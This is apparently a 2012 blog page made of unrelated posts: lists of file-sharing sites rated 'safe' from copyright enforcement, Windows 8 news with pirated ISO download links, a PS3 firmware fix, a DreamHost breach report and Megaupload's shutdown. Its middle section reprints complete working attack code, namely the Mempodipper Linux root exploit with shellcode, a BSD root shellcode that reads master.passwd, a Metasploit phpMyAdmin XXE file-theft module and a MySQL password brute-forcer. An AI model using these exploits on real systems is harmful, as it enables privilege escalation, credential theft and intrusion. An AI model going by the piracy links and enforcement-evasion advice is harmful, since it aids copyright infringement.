Megaupload – Closed.
FileServe – Stopped filesharing. You can only download your own files. Deleting multiple files. Banning Premium accounts. Closed Affiliate Program.
FileJungle – Deleting files. Owned by Fileserve (same as above). Testing USA IP addresses blocking.
FileSonic – Stopped filesharing. You can only download your own files. Closed Affiliate Program. Changed server location Jan 22, 2012. Taken down it’s Facebook page Now using Digital fingerprinting. Files are being deleted as soon as uploaded (as Hotfile did).
UploadStation – Owned by Fileserve (same as above). Testing USA IP addresses blocking.
VideoBB – Closed Affiliate Program.
Uploaded – Banned U.S. and the FBI went after the owners who are gone.
FilePost – Started suspending accounts with infringing material (as Hotfile did)
Videoz – Closed Affiliate Program.
4shared – Deleting files with copyright and waits in line at the FBI.
MediaFire – Called to testify in the next 90 days and it will open doors pro FBI
Org torrent – could vanish with everything within 30 days “he is under criminal investigation”
Network Share mIRC – awaiting the decision of the case to continue or terminate Torrent everything.
EnterUpload – Down (Redirect)
Uploading – Closed for 90 days the affiliate program
Koshiki – Operating 100% Japan will not join the SOPA / PIPA
Shienko Box – 100% working China / Korea will not join the SOPA / PIPA
ShareX BR – group UOL / BOL / iG say they will join the SOPA / PIPA

File hosting server hosted in these places are not safe.
Hong Kong, New Zealand, USA, Netherlands, Canada, Germany, UK, Phillipines… and maybe more…

4shared, badongo, bitshare, fileserve.com, filepost, hotfile, mediafire, megaupload, sendspace, speedyshare, ugotfile, videozer, Wupload, xup.in, zshare.net – Server location is USA

Extabit.com, bigupload, crocko, filefactory, filesonic.com, freakshare, hulkshare, oron, share-online.biz, sharebase.to, speedshare.org, uploaded.to, uploadbox, yourfiles.biz – Server location is Netherlands

Filebase.to, kewlshare, kickload, netload.in, rapidshare.com, Hitfile.net – Server location is Germany

Load.to, share-now.net, tinyupload.com, zippyshare – Server location is France

Ge.tt – Server location is Ireland

Turbobit – Server location is Russia

According to Server location these sites are safe for now

Ge.tt
Location – Ireland / Denmark

Turbobit.net
Location – Russia

Cramit.in
Location – France

Depositfiles.com
Location – Cyprus

Italian site WindowsBlogItalia has posted the installation screenshots of Windows 8 consumer preview.  The screenshots is believed to be from Windows 8 build 8192

These screenshots have also cleared our doubts regarding the naming of the next public release and we can now safely call them as Windows 8 consumer preview.

Some developers have released a RSOD fix via GAMEOS. Now keep in mind if you truly have a hardware problem then this will most likely not help you. also there was a RSOD fix via debain installer. so for those of you that have linux on your ps3 and wish to fix like that can use the linux pup.

The RSOD Fix

Observations about RSOD:

• Seems to appear mostly on consoles with Samsung NORS (CECHL**-CECH20**)
• May be caused by an error being thrown while writing to NOR (this is theory)
• Mostly caused by a corrupt area of flash called VTRM

The original RSOD “fix” was actually a CFW patch to bypass the RSOD.
basic_plugins.sprx was modified to ignore the error condition to allow the console to boot.
While this worked, certain things like trophies still didn’t work correctly.

The actual RSOD fix occurs by the VTRM area on flash being rewritten.
The ability to do this is already built into the firmware, it just needs to be called.

Steps from GameOS:

• 1) Install the NORSOD patched PUP so that you can boot.
• 2) Install the rsodfix.gnpdrm.pkg package, and run it from XMB.
• 3) Run rsodfix.
• 4) Reboot and install whatever firmware you want

Thanks go to: ‘dospeidra, an0nymous, nikitis, robs’ for their efforts to help improve this PS3 ‘scene’!

File #1: NORSOD patched PUP (170mb)
File #2: rsodfix.gnpdrm.pkg (616kb)

More details:

Apparently, the breach occured in November via theone-click install wizard offered by Dreamhost: One click and your wholeWordpress / Drupal web site is installed, ready to use, automatically updatedby the wizard. Apparently, it’s the wizard itself that was compromised andanybody who used it was affected.

DreamHost CEO issued the following statement:

“our systems have stored and used encrypted passwords for a number of years, however the hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted. We’ve now confirmed that there are no more legacy unencrypted passwords in our systems. And we’re investigating further measures to ensure security of passwords including when a customer requests their password by email (this was not the issue here, though).”

Next to shell and FTP passwords, the company is advising its customers to change email passwords as well.

Download MICROSOFT.WINDOWS.8.RC1.ISO-LZ0

Rapidshare
http://rapidshare.com/files/402971244/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar
http://rapidshare.com/files/1787050675/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar

DepositFiles
http://depositfiles.com/files/80o9w6aee
http://depositfiles.com/files/ui7l4ywcw

TurboBit
http://turbobit.net/2o95g2norite/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar.html
http://turbobit.net/sti7wibc65di/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar.html

/*
 * Mempodipper
 * by zx2c4
 *
 * Linux Local Root Exploit
 *
 * Rather than put my write up here, per usual, this time I've put it
 * in a rather lengthy blog post: http://blog.zx2c4.com/749
 *
 * Enjoy.
 *
 * - zx2c4
 * Jan 21, 2012
 *
 * CVE-2012-0056
 */

#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

int send_fd(int sock, int fd)
{
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 int n;
 char cms[CMSG_SPACE(sizeof(int))];

 buf[0] = 0;
 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;
 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = CMSG_LEN(sizeof(int));

 cmsg = CMSG_FIRSTHDR(&msg);
 cmsg->cmsg_len = CMSG_LEN(sizeof(int));
 cmsg->cmsg_level = SOL_SOCKET;
 cmsg->cmsg_type = SCM_RIGHTS;
 memmove(CMSG_DATA(cmsg), &fd, sizeof(int));

 if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
 return -1;
 close(sock);
 return 0;
}

int recv_fd(int sock)
{
 int n;
 int fd;
 char buf[1];
 struct iovec iov;
 struct msghdr msg;
 struct cmsghdr *cmsg;
 char cms[CMSG_SPACE(sizeof(int))];

 iov.iov_base = buf;
 iov.iov_len = 1;

 memset(&msg, 0, sizeof msg);
 msg.msg_name = 0;
 msg.msg_namelen = 0;
 msg.msg_iov = &iov;
 msg.msg_iovlen = 1;

 msg.msg_control = (caddr_t)cms;
 msg.msg_controllen = sizeof cms;

 if ((n = recvmsg(sock, &msg, 0)) < 0)
 return -1;
 if (n == 0)
 return -1;
 cmsg = CMSG_FIRSTHDR(&msg);
 memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
 close(sock);
 return fd;
}

int main(int argc, char **argv)
{
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
 char parent_mem[256];
 sprintf(parent_mem, "/proc/%d/mem", getppid());
 printf("[+] Opening parent mem %s in child.\n", parent_mem);
 int fd = open(parent_mem, O_RDWR);
 if (fd < 0) {
 perror("[-] open");
 return 1;
 }
 printf("[+] Sending fd %d to parent.\n", fd);
 send_fd(atoi(argv[2]), fd);
 return 0;
 }

 printf("===============================\n");
 printf("= Mempodipper =\n");
 printf("= by zx2c4 =\n");
 printf("= Jan 21, 2012 =\n");
 printf("===============================\n\n");

 int sockets[2];
 printf("[+] Opening socketpair.\n");
 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
 perror("[-] socketpair");
 return -1;
 }
 if (fork()) {
 printf("[+] Waiting for transferred fd in parent.\n");
 int fd = recv_fd(sockets[1]);
 printf("[+] Received fd at %d.\n", fd);
 if (fd < 0) {
 perror("[-] recv_fd");
 return -1;
 }
 printf("[+] Assigning fd %d to stderr.\n", fd);
 dup2(2, 6);
 dup2(fd, 2);

 unsigned long address;
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
 address = strtoul(argv[2], NULL, 16);
 else {
 printf("[+] Reading su for exit@plt.\n");
 // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
 FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
 char result[32];
 result[0] = 0;
 fgets(result, 32, command);
 pclose(command);
 address = strtoul(result, NULL, 16);
 if (address == ULONG_MAX || !address) {
 printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
 printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
 return 1;
 }
 printf("[+] Resolved exit@plt to 0x%lx.\n", address);
 }
 printf("[+] Calculating su padding.\n");
 FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
 char result[256];
 result[0] = 0;
 fgets(result, 256, command);
 pclose(command);
 unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
 unsigned long offset = address - su_padding;
 printf("[+] Seeking to offset 0x%lx.\n", offset);
 lseek64(fd, offset, SEEK_SET);

#if defined(__i386__)
 // See shellcode-32.s in this package for the source.
 char shellcode[] =
 "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
 "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
 "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
 "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
 "\x80";
#elif defined(__x86_64__)
 // See shellcode-64.s in this package for the source.
 char shellcode[] =
 "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
 "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
 "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
 "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
 "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";

#else
#error "That platform is not supported."
#endif
 printf("[+] Executing su with shellcode.\n");
 execl("/bin/su", "su", shellcode, NULL);
 } else {
 char sock[32];
 sprintf(sock, "%d", sockets[0]);
 printf("[+] Executing child from child fork.\n");
 execl("/proc/self/exe", argv[0], "-c", sock, NULL);
 }
}

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
###
# Title : bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) shellcode - 94 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Type : Shellcode - 94 Bytes
# BSD's : FreeBSD , OpenBSD , DragonflyBSD
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##

*/

#include <stdio.h>

char sc[] =
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\x50" // push %eax
"\x50" // push %eax
"\xB0\x7E" // mov %al,$0x7E
"\xCD\x80" // int $0x80
"\x6A\x3B" // push $0x3B
"\x58" // pop %eax
"\x99" // csq
"\x52" // push %edx
"\x68\x2D\x63\x00\x00" // push $0x632D
"\x89\xE7" // mov %edi,%esp
"\x52" // push %edx
"\x68\x6E\x2F\x73\x68" // push $0x68732F6E
"\x68\x2F\x2F\x62\x69" // push $0x69622F2F
"\x89\xE3" // mov %ebx,%esp
"\x52" // push %edx
"\xE8\x20\x90\x90" // call me
"\x2F" // das
"\x62\x69\x6E" // bound %ebp,qword %ecx $0x6E
"\x2F" // das
"\x73\x68" // jnb short me
"\x20\x2D\x63\x20\x22\x2F" // and $0x2F222063,%ch
"\x65\x74\x63" // je short me
"\x2F" // das
"\x6D" // ins dword %edi,%dx
"\x61" // popad
"\x73\x74" // jnb short
"\x65\x72\x2E" // jb short
"\x70\x61" // jo short
"\x73\x73" // jnb short
"\x77\x64" // ja short
"\x22\x00" // and %al,%eax
"\x57" // push %edi
"\x53" // push %ebx
"\x89\xE1" // mov %ecx,%esp
"\x52" // push %edx
"\x51" // push %ecx
"\x53" // push %ebx
"\x50" // push %eax
"\xCD\x80" // int $0x80
"\x31\xC0" // xor %eax,%eax
"\x50" // push %eax
"\xB0\x01" // mov %al,$0x01
"\xCD\x80"; // int $0x80

int main()
{
 int (*dz)() = (int(*)())sc;
 printf("bytes: %u\n", strlen(sc));
 dz();
}

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================

# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::HttpClient
 
 def initialize
 super(
 'Name' => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
 'Version' => '1.0',
 'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
 The attacker must be logged in to MySQL via phpMyAdmin.
 Works on Windows and Linux Versions 3.3.X and 3.4.X},
 'References' =>
 [
 [ 'CVE', '2011-4107' ],
 [ 'OSVDB', '76798' ],
 [ 'BID', '50497' ],
 [ 'URL', 'http://secforce.com/research/'],
 ],
 'Author' => [ 'Marco Batista' ],
 'License' => MSF_LICENSE
 )

 register_options(
 [
 Opt::RPORT(80),
 OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
 OptString.new('USER', [ true, "Username", 'root']),
 OptString.new('PASS', [ false, "Password", 'password']),
 OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
 OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
 OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
 OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
 ],self.class)
 end

 def loginprocess
 # HTTP GET TO GET SESSION VALUES
 getresponse = send_request_cgi({
 'uri' => datastore['APP']+'/index.php',
 'method' => 'GET',
 'version' => '1.1',
 }, 25)

 if (getresponse.nil?)
 print_error("no response for #{ip}:#{rport}")
 elsif (getresponse.code == 200)
 print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
 elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
 print_status("Received 302 to #{getresponse.headers['Location']}")
 else
 print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
 end

 valuesget = getresponse.headers["Set-Cookie"]
 varsget = valuesget.split(" ")

 #GETTING THE VARIABLES NEEDED
 phpMyAdmin = varsget.grep(/phpMyAdmin/).last
 pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
 # END HTTP GET

 # LOGIN POST REQUEST TO GET COOKIE VALUE
 postresponse = send_request_cgi({
 'uri' => datastore['APP']+'/index.php',
 'method' => 'POST',
 'version' => '1.1',
 'headers' =>{
 'Content-Type' => 'application/x-www-form-urlencoded',
 'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
 },
 'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
 }, 25) 

 if (postresponse["Location"].nil?)
 print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
 tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
 else
 tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
 end

 valuespost = postresponse.headers["Set-Cookie"]
 varspost = valuespost.split(" ")

 #GETTING THE VARIABLES NEEDED
 pmaUser = varspost.grep(/pmaUser-1/).last
 pmaPass = varspost.grep(/pmaPass-1/).last

 return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
 # END OF LOGIN POST REQUEST
 rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
 print_error(e.message)
 rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
 print_error(e.message)
 end

 def readfile(cookie,tokenvalue)
 #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
 getfiles = send_request_cgi({
 'uri' => datastore['APP']+'/export.php',
 'method' => 'POST',
 'version' => '1.1',
 'headers' =>{
 'Cookie' => cookie
 },
 'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
 }, 25)

 if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
 print_error("Error reading the file... not enough privilege? login error?")
 else
 print_status("#{getfiles.body}")
 end
 end

 def dropdatabase(cookie,tokenvalue)
 dropdb = send_request_cgi({
 'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
 'method' => 'GET',
 'version' => '1.1',
 'headers' =>{
 'Cookie' => cookie
 },
 }, 25)

 print_status("Dropping database: "+datastore['DB'])
 end

 def run
 cookie,tokenvalue = loginprocess()

 print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

 craftedXML = "------WebKitFormBoundary3XPL01T\n"
 craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
 craftedXML << tokenvalue+"\n"
 craftedXML << "------WebKitFormBoundary3XPL01T\n"
 craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
 craftedXML << "server\n"
 craftedXML << "------WebKitFormBoundary3XPL01T\n"
 craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
 craftedXML << "Content-Type: text/xml\n\n"
 craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
 craftedXML << "<!DOCTYPE ficheiro [ \n"
 craftedXML << " <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
 craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
 craftedXML << " <pma:structure_schemas>\n"
 craftedXML << " <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
 craftedXML << " <pma:table name=\""+datastore['TBL']+"\">\n"
 craftedXML << " CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
 craftedXML << " </pma:table>\n"
 craftedXML << " </pma:database>\n"
 craftedXML << " </pma:structure_schemas>\n"
 craftedXML << " <database name=\""+datastore['DB']+"\">\n"
 craftedXML << " <table name=\""+datastore['TBL']+"\">\n"
 craftedXML << " <column name=\"file\">&conteudo;</column>\n"
 craftedXML << " </table>\n"
 craftedXML << " </database>\n"
 craftedXML << "</pma_xml_export>\n\n"
 craftedXML << "------WebKitFormBoundary3XPL01T\n"
 craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
 craftedXML << "xml\n"
 craftedXML << "------WebKitFormBoundary3XPL01T\n"
 craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
 craftedXML << ",\n\n"
 craftedXML << "------WebKitFormBoundary3XPL01T--"

 print_status("Grabbing that #{datastore['FILE']} you want...")
 res = send_request_cgi({
 'uri' => datastore['APP']+'/import.php',
 'method' => 'POST',
 'version' => '1.1',
 'headers' =>{
 'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
 'Cookie' => cookie
 },
 'data' => craftedXML
 }, 25)

 readfile(cookie,tokenvalue)

 if (datastore['DROP'] == "true")
 dropdatabase(cookie,tokenvalue)
 else
 print_status("Database was not dropped: "+datastore['DB'])
 end

 end
end

/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU Library General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
 *
 * Author:
 * NAME: James Stevenson
 * WWW: http://www.stev.org
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>

#include <mysql/mysql.h>

int verbose = 0;
int total = 0;
volatile int quit = 0;

pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;

struct args {
 char *host;
 char *db;
 int port;
};

void print_help(FILE *fp, char *app) {
 fprintf(fp, "Usage: %s [<options>]\n", app);
 fprintf(fp, "\n");
 fprintf(fp, " -h Print this help and exit\n");
 fprintf(fp, " -v Verbose. Repeat for more info\n");
 fprintf(fp, " -t <host> host to try\n");
 fprintf(fp, " -p <port> port to connect on\n");
 fprintf(fp, " -n <num> number of threads to use\n");
 fprintf(fp, "\n");
 fprintf(fp, "Note: usernames / password will be read from stdin\n");
 fprintf(fp, "The format for this is username:password\n");
 fprintf(fp, "\n");
}

int try(char *hostname, char *username, char *password, char *db, int port) {
 MYSQL mysql;
 mysql_init(&mysql);

 if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) {
 switch(mysql_errno(&mysql)) {
 case 1045: /* ER_ACCESS_DENIED_ERROR */
 if (verbose >= 1)
 printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
 break;
 default:
 printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql));
 break;
 }
 return 0;
 }

 if (verbose >= 1)
 printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));

 mysql_close(&mysql);
 return 1;
}

int getpassword(char **buf, size_t *buflen, char **username, char **password) {

 pthread_mutex_lock(&mutex_pass);

 if (getline(buf, buflen, stdin) >= 0) {
 pthread_mutex_unlock(&mutex_pass);
 char *tmp = strchr(*buf, ':');
 if (tmp == 0 || tmp[1] == 0)
 return 0;
 *username = *buf;
 *tmp = 0;
 tmp++;
 *password = tmp;
 tmp = strchr(*password, '\n');
 if (tmp != 0)
 *tmp = 0;
 if (verbose >= 2)
 printf("username: %s password: %s\n", *username, *password);
 return 1;
 }

 pthread_mutex_unlock(&mutex_pass);
 return 0;
}

void *run(void *p) {
 struct args *a = (struct args *) p;
 char *buf = 0;
 size_t buflen = 0;
 char *user = 0;
 char *pass = 0;

 while(quit == 0) {
 if (getpassword(&buf, &buflen, &user, &pass) == 0)
 goto free; /* we ran out of passwords */

 if (try(a->host, user, pass, a->db, a->port)) {
 printf("Success! Username: %s Password: %s\n", user, pass);
 quit = 1;
 goto free;
 }
 }

free:
 if (buf != NULL)
 free(buf);

 pthread_exit(NULL);
 return NULL;
}

int main(int argc, char **argv) {
 struct args args;
 pthread_t *thd;
 pthread_attr_t attr;
 int nthreads = 1;
 int i = 0;
 int c;

 memset(&args, 0, sizeof(args));

 while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) {
 switch(c) {
 case 'd':
 args.db = optarg;
 break;
 case 'h':
 print_help(stdout, argv[0]);
 exit(EXIT_SUCCESS);
 break;
 case 'n':
 nthreads = atoi(optarg);
 break;
 case 't':
 args.host = optarg;
 break;
 case 'v':
 verbose++;
 break;
 case 'p':
 args.port = atoi(optarg);
 break;
 }
 }

 if (args.db == NULL)
 args.db = "mysql";

 if (args.host == NULL)
 args.host = "localhost";

 thd = malloc(nthreads * sizeof(*thd));
 if (!thd) {
 perror("malloc");
 exit(EXIT_FAILURE);
 }

 mysql_library_init(0, NULL, NULL); 

 if (pthread_attr_init(&attr) != 0) {
 perror("pthread_attr_init");
 exit(EXIT_FAILURE);
 }

 if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) {
 perror("pthread_attr_setdetachstate");
 exit(EXIT_FAILURE);
 }

 for(i=0;i<nthreads;i++) {
 if (pthread_create(&thd[i], NULL, run, &args) != 0) {
 perror("pthread_create");
 exit(EXIT_FAILURE);
 }
 }

 for(i=0;i<nthreads;i++) {
 if (pthread_join(thd[i], NULL) != 0) {
 perror("pthread_join");
 exit(EXIT_FAILURE);
 }
 }

 pthread_attr_destroy(&attr);

 free(thd); 

 mysql_library_end();
 return EXIT_SUCCESS;
}

One of the worlds most popular file sharing websites — Megaupload — who had been in the news recently for their controversial song featuring many famous artists, has been shut down by federal prosecutors in the United States.

The New York Times reports that the indictment accuses the company of costing over $500 million in lost revenue due to pirated films, TV shows, music and other content.

Megaupload founder and operator — Kim Dotcom was arrested along with three others in New Zealand on Thursday at the request of US officials. A total of seven were arrested globally, and their charges include conspiracy to commit racketeering and criminal copyright infringement for running the ”the Mega conspiracy websites” according to the DOJ.

Dotcom is no stranger to the wrong side of the law, previously being convicted for credit card fraud, hacking, insider trading and embezzlement.

Just before the site was taken down today, it posted a statement on its homepage saying that claims they facilitated copyright infringement were ”grotesquely overblown” and went on to say ”The fact is that the vast majority of Mega’s Internet traffic is legitimate, and we are here to stay. If the content industry would like to take advantage of our popularity, we are happy to enter into a dialogue. We have some good ideas. Please get in touch.”